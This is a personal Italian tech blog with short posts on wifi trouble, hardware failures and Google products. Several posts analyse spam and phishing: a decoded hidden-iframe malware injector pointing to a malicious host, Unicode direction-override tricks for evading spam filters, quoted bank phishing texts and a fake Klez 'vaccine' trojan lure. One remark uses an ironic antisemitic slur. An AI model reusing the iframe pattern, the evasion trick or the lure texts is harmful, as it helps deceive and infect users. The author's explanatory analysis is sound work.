Notiziole di .mau.

e tutto ad un tratto...

oggi funziona la schedina vecchia sul PC di Anna e non quella nuova sul mio. Secondo me, ci vuole un esorcista.

solite arti magiche

Ieri sera Loris � passato a casa mia per vedere cosa non funzionava nella nostra rete wifi. Dopo due ore con tre PC (win98, xp e fedora), tre schedine wireless (una vecchia Orinoco, una rtl8180 e una Cisco) e due access point (il nostro digicom e quello portato da Loris) abbiamo scoperto che:
- l'access point funziona
- il mio PC funziona, ma non sembrano funzionare n� la mia scheda wifi rtl (troppi CRC error in ricezione) n� la mia schedina USB 2.0.
- da qualche parte nel mio palazzo ci potrebbe essere un'apparecchiatura sulla frequenza 2.4 GB, che non � una rete wifi e soprattutto spara pi� o meno ovunque sulle frequenze;
- spostandomi sul canale 1, l'orinoco funziona sul mio PC vicino all'access point, non sembra funzionare su quello di Anna lontano dall'access point. Ma qui mancano ancora ulteriori informazioni.
Il tutto naturalmente senza nessuna certezza, altrimenti non staremmo parlando di informatica.

e-cartolina virale?

Tra lo spam odierno, mi � arrivato il messaggio che affermava che avevo un "Multimedia Postcards(R) Greeting" per me, con tanto di sito dove andare a scaricare (http://www.bazumcircus.it/img/news2/) e codice ( DP_42a04492060aaa46).
Per curiosit� ho provato ad andare direttamente sulla homepage del sito... e Mozilla mi si � chiuso. A questo punto ho fatto quello che dovevo fare subito, vale a dire prendere Lynx: la home page mi d� (anzi mi dava, l'hanno gi� chiuso) una sfilza di link a siti che offrono medicinali sessuali, e terminava con un document.write scritto in esadecimale, che tradotto d�
ME SRC="http://crunet.info/out.php?s_id=1" WIDTH=0 BORDER=0 HEIGHT=0 style="display:none">.
crunet.info � un sito russo - o almeno scritto in russo, e quel php mi rimanda a un non meglio identificato http://195.225.177.33/0305.html; il quale per� (senza ammettere cookie, ovvio) non dice molto. Zigh, una ricerchina fatta per nulla... per� mi pareva pi� professionale del solito.

AGGIORNAMENTO:Naturalmente io sono stato cos� stupido da scrivere io il testo "IFRAME". Solo che non usando internet explorer, naturalmente non mi capitava nulla, cos� come non � capitato nulla a chi mi legge con safari, mozilla, netscape ... (o via RSS). Adesso che zop mi ha fatto notare la cosa ho scoperto la gabola (adesso la scritta non � pi� lanciabile, tranquilli!)

misteri di proxy

Dall'ufficio mi connetto a Internet con un proxy. Come molti sanno, chi gestisce il proxy pu� fare tante belle cose, come bloccare - o magari rallentare molto - l'accesso a una serie di siti. In genere, questo capita con il porno; da noi, a quanto sembra, sotto la scure � caduto Mutts (sul porno non saprei dire).

pihshnig

Di phishing ne ho parlato pi� volte, e ho anche fatto notare come l'italiano del testo (quando c'�) sia in genere piuttosto teorico. Ma per gli sfortunati che non hanno ricevuto questo messaggio - a me � fin arrivato doppio, una copia � stata riconosciuta come spam, l'altra no - non posso esimermi dal mostrarvelo.

Bcnaa Ietnsa/ BancoPtsoa/ San Paool IMI/ Finceo ceihde il vtsoro cotubirtno:
Per i posesssori di un cnoto, a segotiu di virefiche di l'irednizzo di potsa enorttelica nei nirtso daatbase clienti, si e
reos necoirasse uzzilito online la cofnerma dei Soui dait. Le chiedaimo pcreio di confermicra i dait in nsotro possesso,
accedeodn al seugente form proteott:

No, non � il risultato di un dislessico, n� un esercizio di stile � la Queneau. Andando a vedere il sorgente del messaggio, si scopre che il testo � in multipart/alternate (cio�, ci sono due pezzi che dovrebbero avere lo stesso contenuto), testo normale o html. Solo che il testo normale � in realt� vuoto, quindi deve per forza essere mostrato quello in HTML, che comincia cos�:

B‮cna‬a I‮etn‬sa/ BancoP‮tso‬a/ San Pao‮ol‬ IMI/ Fin‮ce‬o c‮eih‬de il v‮tso‬ro co‮tubirtn‬o:

Non spaventatevi. I "caratteri" - se vogliamo fare gli esperti, dovremmo chiamarli "entit�", ma chisseneimporta - ‮ e ‬ significano rispettivamente "da qua si scrive da destra a sinistra" e "da qua non si scrive pi� da destra a sinistra". Quindi, se apriamo il messaggio con un programma che capisce bene HTML, la prima parola � "B" , poi "cna" scritto alla rovescia e che quindi diventa "anc", e infine "a". Risultato? "Banca".
In questo modo, per�, i sistemi antispam non riescono a riconoscere la parola incriminata, e quindi non scatta l'allarme spam.
Peccato (per lo spammer, intendo) che il sistema sia troppo intelligente, e ad esempio sull'interfaccia di Gmail non funzioni...

Toh.

Hanno defaced (defacciato? sfacciato? insomma, hanno craccato la pagina mettendo il loro bel logo) la pagina delle comunit� di Splinder.

Il mio portatile si sfalda

Non sono cose belle da dirsi. Per� ha iniziato il mio mouse, che connettevo per mezzo di un adattatore alla porta PS/2 e a un tratto ha smesso di funzionare: se lo metto sulla porta USB funziona perfettamente, e mouse+adattatore vanno bene su un altro PC. Poi a un tratto la schedina wi-fi si � anch'essa bloccata, dando una sfilza di CRC errors e nemmeno un pacchetto ricevuto. Il router funziona, perch� la schedina sulla macchina di Anna funziona perfettamente; la scheda non so, perch� non ho voglia di installare tutto il software sull'altro pc. La scheda di Anna, che � pi� vecchia, vede la rete ma non ci si attacca.
Mo' che faccio? io contavo di sopravviverci ancora un annetto, in fin dei conti il pc � del 2002. Una riparazione comincia a costarmi troppo. Forse un'imposizione delle mani?

un po' di attenzione, insomma!

Capisco volere fare del phishing scritto in un italiano diciamo "interessante" (che ne dite di «se recentemente accedeste al vostro conto mentre viaggiavate»?)
Capisco che non sono molti a guardare le header e vedere che il messaggio � stato spedito da TLV62-0-78-214.bb.netvision.net.il (eh, questi sporchi ebrei... :-) )
Per� postare il messaggio usando come mittente ChiquitaBayno@bancopostaonline.poste.it mi pare un po' troppo!

GMail un po' kaputt

stasera sono arrivato a casa e ho cercato di guardare la posta. Peccato che il mio fido browser (e persino Internet Explorer) mi dicessero "sito irraggiungibile". In realt� le cose non stavano proprio cos�: infatti una connessione con Lynx ha portato a tutta una serie di lamentele su certificati che non si trovavano, ma alla fine mi ha fatto vedere il sito (con un'altra serie di lamentele, questa volta da parte di Gmail stesso, che mi spiegava che cos� "non avevo la vera experience". Seeh, ancora grazie si arrivasse cos�! Bisogna dire che Lynx � davvero una forza della natura, uno schiacciasassi.

Computer a manovella

Chi avesse letto City venerd� scorso avrebbe trovato un trafiletto su un "portatile per bambini che funziona a manovella". La notizia di per s� � vera: PCWorld ad esempio ne parla estesamente.
Naturalmente le cose stanno in maniera un po' diversa da quanto traspare dall'italico quotidiano gratuito: non � il regalo di Natale da fare al proprio bimbo, ma � parte di un progetto di alfabetizzazione informatica per le scuole dei paesi in via di sviluppo. Negroponte (ma � tornato all'MIT?) ha gi� messo le mani avanti, dicendo che anche se il prototipo uscir� a novembre la produzione di massa non avverr� se non a fine 2006; e inoltre che sa bene che cento dollari sono ancora troppi, ma spera in un ulteriore ribasso dei costi. Per� bisogna dire che ci sono delle idee interessanti: oltre alla manovella per i posti dove non c'� corrente - un minuto di giro permetter� dieci minuti d'uso - e che era gi� stata sfruttata nelle radio portatili, ci sar� la possibilit� di convertire il display a colori in uno in bianco e nero ad alta visibilit�. Per i fanatici: il sistema operativo sar� una versione minimale di Linux.
Non so quanto un PC portatile possa essere utile a gente che magari non ha nemmeno di che mangiare, ma forse non � cos� male pensare anche oltre l'immediato; basta appunto che sia un "anche".

Avete presente i vaccini?

Ecco il testo, tradotto in italiano, di un troiano che � arrivato su una mailing list che gestisco. Il testo era in HTML, e l'indirizzo era ovviamente di un iscritto alla lista che non c'entrava nulla: il messaggio proviene da un PC di Telecom Argentina. Il corsivo � mio.

Klez.E � il pi� comune worm che si sta diffondendo in tutto il mondo. � molto pericoloso, corrompendo i vostri file.
A causa del suo modo molto astuto di nascondersi e della tecnica anti-anti-virus, la maggior parte del software AV non riesce a scoprirlo o rimuoverlo.
Abbiamo sviluppato questo programma gratuito di immunizzazione per sconfiggere questo virus maligno.
Dovete solo lanciarlo una volta, e Klez non entrer� mai nel vostro PC.
NOTA: Poich� questo programma agisce come un finto Klez per confondere il vero worm, alcuni monitor AV potrebbero lamentarsi mentre lo fate girare.
In tal caso, ignorate l'avviso e cliccate su 'continua'.
Per ogni questione, inviatemi una mail.

Anche in questo caso ci troviamo di fronte a un sistema di "ingegneria sociale". L'utente quadratico medio ha sentito dire che i vaccini (quelli che ti iniettano) sono forme deboli dello stesso batterio che devono combattere, e quindi magari non si scompone a leggere qualcosa del genere...

google blog search

Ecco l'ennesima beta di Google. Beh, non credo ci sia un progetto Google che non sia in beta :-). Ad ogni modo, con Google Blog Search � possibile fare una ricerca limitata ai blog. Leggendo le faq relative, si pu� scoprire che "blog" in questo contesto significa "qualcosa con un feed RSS o Atom"; che l'indicizzazione � partita da giugno; e che la ricerca pu� essere fatta con l'interfaccia google o con quella di blogger.
Se devo essere sincero, non vedo un grande valore aggiunto, ma magari qualcuno ha delle idee migliori di me.

Aggiornamento: il Guru ne ha.

phishing su Fineco

� quello di stanotte. Ll'italiano � indubbiamente molto strano, anche se grammaticalmente sembra corretto. Anche l'idea di dire "visto che bisogna aumentare la sicurezza, cambiamo server" non � affatto male, guardata dal punto di vista di uno che di internette non ci capisce un tubo. "Se al mercato mi cambiano la macchinetta per verificare le banconote false, qui mi cambiano il server": non � cos� immediato capire che l'URL � come l'indirizzo di casa, e quindi non ha ragione di essere modificato.
Ma il top lo si raggiunge con la frase finale: «... altrimenti entro 24 ore il Vostro conto internet per la Vostra stessa sicurezza verr� temporaneamente bloccato per far uscire i mezzi finanziari allo scopo di evitare il numero sempre pi� incremento di assalti "Phishing"». Me li vedo, questi mezzi finanziari che escono a vele spiegate!

In una notizia correlata, come dicono gli americani, mi hanno fatto notare un altro spam di ieri, da tale "Sateny Finance Group" che propone di «effettuare il trasferimento dei pagamenti tra i nostri clienti, trattenendo una commissione per ogni operazione.», ricevendo «pagamenti che vanno dai 1000 ai 50000 o pi� USD». Con ogni probabilit�, riciclaggio.

quando si dice "basta"...

In ufficio mi avevano dato una specie di portachiavi RSA SecurID® che ogni minuto generava casualmente un numero di sei cifre che, unito al mio pin, completava la password per connettermi alla rete interna di IT Telecom prima e TIM poi, per la serie "massima sicurezza". Sul retro c'era indicata una data, 07/31/05, a cui non avevo fatto caso, anche perch� in pratica non � che nell'ultimo anno l'abbia usata chiss� quanto.
Bene, prima di partire per le ferie avevo tolto il portachiavi dal marsupio: il numerino non c'� pi�, e il display segna un bell'OFF. Sicuramente quelli di RSA vogliono essere certi sulla durata dell'aggeggio!

congiunzioni astrali?

Ad aprile avevo scritto che il mio PC non riusciva pi� a capire che i collegamenti dovevano essere attraversati e non aperti, quando volevo salvare un file.
Oggi a quanto pare il clic funziona nuovamente. Non ho fatto assolutamente nulla, lo giuro. Sar� un sottoprodotto delle stelle cadenti che in teoria oggi stanno allietando la vista di chi non si trova in mezzo a una grande citt� col cielo coperto?